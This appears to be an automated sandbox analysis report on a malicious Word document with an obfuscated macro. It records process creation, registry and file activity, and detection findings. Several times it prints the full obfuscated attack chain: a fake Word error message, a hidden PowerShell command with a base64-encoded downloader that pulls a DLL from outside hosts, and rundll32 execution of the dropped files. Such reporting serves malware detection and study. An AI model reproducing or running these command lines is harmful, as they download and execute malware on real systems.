AnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',nZgZ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod',#1

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2327249466.0000000002A60000.00000002.00000001.sdmp
Source:	Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: N00048481397007.doc	Stream path 'Macros/VBA/Gp0t5ucwnkng7fi' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Gp0t5ucwnkng7fi			Name: Gp0t5ucwnkng7fi

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcA

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 